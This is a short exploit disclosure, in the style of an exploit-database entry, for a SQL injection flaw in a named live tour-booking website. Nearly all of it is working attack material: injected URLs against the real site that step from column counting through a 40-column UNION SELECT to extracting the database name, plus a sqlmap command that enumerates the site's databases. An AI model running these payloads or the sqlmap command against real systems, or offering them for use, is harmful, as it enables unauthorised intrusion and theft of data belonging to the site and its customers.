#Exploit Title: Aimo tour – SQL Injection vulnerability #Date: 2020-08-25 #Exploit Author: Hussien AL-Malki #Vendor Homepage: Privacy Policy | Cmzone Designwww.Stats.in.th #Google Dork: N/A #Category: webapps #Tested On: blackerch linux , Firefox #Software Link: https://www.aimotour.com/ Proof of Concept: Search google Dork: site:https://www.aimotour.com/ id= Demo: https://www.aimotour.com/mobile/fn/tourdetail.php?id=-174' Demo:https://www.aimotour.com/mobile/fn/tourdetail.php?id=-174' order by 40-- - Demo:https://www.aimotour.com/mobile/fn/tourdetail.php?id=-174' Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40-- - Demo:https://www.aimotour.com/mobile/fn/tourdetail.php?id=-174' Union Select 1,2,3,4,5,6,7,8,9,10,11,concat(database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40-- - ################################################################# Use sqlmap sqlmap -u "https://www.aimotour.com/mobile/fn/tourdetail.php?id=174" --dbs ********************************************************* #Discovered by: Hussien AL-Malki *********************************************************